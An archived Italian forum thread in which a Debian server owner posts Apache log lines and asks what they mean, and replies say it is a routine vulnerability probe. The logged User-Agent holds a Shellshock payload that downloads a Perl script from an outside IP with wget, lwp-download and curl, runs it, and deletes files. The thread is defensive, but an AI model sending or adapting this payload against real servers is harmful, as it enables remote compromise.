PDA

View Full Version : [Apache on Debian]mi aiutate a capire questi logs ?

RaouL_BennetH
06-10-2015, 14:12
Buonasera a tutti.

Ho questi logs su un serverino con apache:


62.210.157.90 - - [06/Oct/2015:11:16:44 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""
62.210.157.90 - - [06/Oct/2015:11:19:28 +0200] "GET /hello HTTP/1.0" 404 486 "-" "() { :;}; /bin/bash -c \"cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*\""


se si va sul link indicato: http://23.229.121.186/paf, c'è un bello scriptino.

Sapreste analizzarlo e cercare di spiegarmi cosa significa ?

Grazie a tutti.
luckylisp
11-10-2015, 22:03
Unable to connect

Firefox can't establish a connection to the server at 23.229.121.186.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer's network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
pabloski
11-10-2015, 22:18
E' un tentativo di verificare la presenza di una vulnerabilità sul web server. Normalmente ne arrivano parecchie migliaia al giorno.
RaouL_BennetH
12-10-2015, 11:46
E' un tentativo di verificare la presenza di una vulnerabilità sul web server. Normalmente ne arrivano parecchie migliaia al giorno.

Ah ok, grazie mille :)